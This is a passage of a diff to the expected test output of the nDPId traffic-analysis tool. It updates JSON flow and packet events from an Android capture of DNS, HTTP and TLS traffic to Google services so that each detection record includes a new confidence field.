 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871814,"flow_last_seen":1582454871814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871814,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1582454871814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871814,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CFFAAEAGrQ\/AqAIQrNkVysroAbtCYT8sAAAAAKAC\/\/889QAAAgQFtAQCCAr\/\/zd9AAAAAAEDAwg="}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}}
+00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1582454871823,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454871823,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrCJAAEARCSjAqAIQwKgCASm1ADUALW7k1fkBAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1582454871824,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1582454871824,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRS4IAAEARqbjAqAIBwKgCEAA1KbUAPSLB1fmBgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871824,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871824,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1582454871827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871827,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8rCNAAEARCSzAqAIQwKgCAYBAADUAKPh7cqMBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="}
-00736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1582454871827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1582454871827,"pkt":"TGr2n\/YnxiwDYGpkCABFAABMd48AAEARfbDAqAIBwKgCEAA1gEAAOLeFcqOBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871829,"flow_last_seen":1582454871829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871829,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1582454871829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871829,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SmpAAEAGbHTAqAIQrNkUTKp+Abul3n3qAAAAAKAC\/\/+8ngAAAgQFtAQCCAr\/\/zeAAAAAAAEDAwg="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871839,"flow_last_seen":1582454871839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871839,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -282,101 +282,101 @@
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1582454871855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871855,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0wixAAEAGtnfAqAIQ2O8meID2AbsYfvWpTGBDc4AQAVe7FAAAAQEICv\/\/N4fDx9w1"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1582454871867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871867,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8+7cAAHUGxias2RRMwKgCEAG7qn7jcCu5pd5966AS6yBHnwAAAgQFZAQCCArp2ZEZ\/\/83gAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1582454871873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871873,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SmtAAEAGbHvAqAIQrNkUTKp+Abul3n3r43AruoAQAVdf2wAAAQEICv\/\/N4vp2ZEZ"}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1582454871881,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1582454871881,"pkt":"xiwDYGpkTGr2n\/YnCABFAABErDBAAEARCRfAqAIQwKgCAZtQADUAMNjjuKUBAAABAAAAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": 